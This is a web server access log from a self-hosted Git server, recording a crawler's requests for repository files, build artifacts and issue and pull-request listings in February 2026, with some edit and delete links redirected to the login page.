"/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt?display=source" [Client 74.7.227.38] [Length 13778] [Gzip 3.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" +[17/Feb/2026:19:45:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt?display=rendered" [Client 74.7.227.38] [Length 10961] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" +[17/Feb/2026:19:45:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt?display=rendered" [Client 74.7.227.38] [Length 10962] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" +[17/Feb/2026:19:45:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt?display=rendered" [Client 74.7.227.38] [Length 10961] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" +[17/Feb/2026:19:45:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt?display=source" [Client 74.7.227.38] [Length 14066] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" +[17/Feb/2026:19:45:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:19:45:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:19:45:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:19:45:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:19:45:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 11157] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/struct.pyc" +[17/Feb/2026:19:45:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9861] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/struct.pyc" +[17/Feb/2026:19:45:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/build/PostgresPatrol/localpycs/struct.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/struct.pyc" +[17/Feb/2026:19:45:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/build/PostgresPatrol/localpycs/struct.pyc" +[17/Feb/2026:19:45:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/struct.pyc" [Client 74.7.227.38] [Length 1045] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/struct.pyc" +[17/Feb/2026:19:45:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/struct.pyc" [Client 74.7.227.38] [Length 305] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/struct.pyc" +[17/Feb/2026:19:45:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/build/PostgresPatrol/localpycs/struct.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/struct.pyc" +[17/Feb/2026:19:45:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/build/PostgresPatrol/localpycs/struct.pyc" +[17/Feb/2026:19:45:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:45:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:45:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:45:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10043] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:45:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10229] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:45:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:45:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:45:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:45:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:45:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:45:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:45:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9989] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:45:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg?display=rendered" [Client 74.7.227.38] [Length 10886] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" +[17/Feb/2026:19:45:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg?display=rendered" [Client 74.7.227.38] [Length 10887] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" +[17/Feb/2026:19:45:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg?display=rendered" [Client 74.7.227.38] [Length 10886] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" +[17/Feb/2026:19:45:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=source" [Client 74.7.227.38] [Length 35718] [Gzip 10.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:19:45:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=source" [Client 74.7.227.38] [Length 12793] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:19:45:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=source" [Client 74.7.227.38] [Length 35746] [Gzip 10.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:19:45:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=source" [Client 74.7.227.38] [Length 12790] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:19:45:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=source" [Client 74.7.227.38] [Length 35752] [Gzip 10.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:19:45:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=source" [Client 74.7.227.38] [Length 35753] [Gzip 10.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:19:45:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.3%2fxref-GoldMonitor_V5.3.html" [Client 74.7.227.38] [Length 23954] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" +[17/Feb/2026:19:45:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.1%2fxref-GoldMonitor_V5.1.html" [Client 74.7.227.38] [Length 23958] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" +[17/Feb/2026:19:45:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.2%2fxref-GoldMonitor_V5.2.html" [Client 74.7.227.38] [Length 23976] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" +[17/Feb/2026:19:45:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache?display=source" [Client 74.7.227.38] [Length 11365] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" +[17/Feb/2026:19:45:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt?display=rendered" [Client 74.7.227.38] [Length 11227] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" +[17/Feb/2026:19:45:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.AssemblyReference.cache?display=rendered" [Client 74.7.227.38] [Length 11174] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.AssemblyReference.cache" +[17/Feb/2026:19:45:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache?display=rendered" [Client 74.7.227.38] [Length 11233] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" +[17/Feb/2026:19:45:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:45:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcConnectionTest%2fobj%2fDebug%2fnet8.0%2fOpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" [Client 74.7.227.38] [Length 21777] [Gzip 3.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" +[17/Feb/2026:19:45:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10008] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:45:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10009] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:45:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10163] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:46:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:46:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.50] [Sent-to 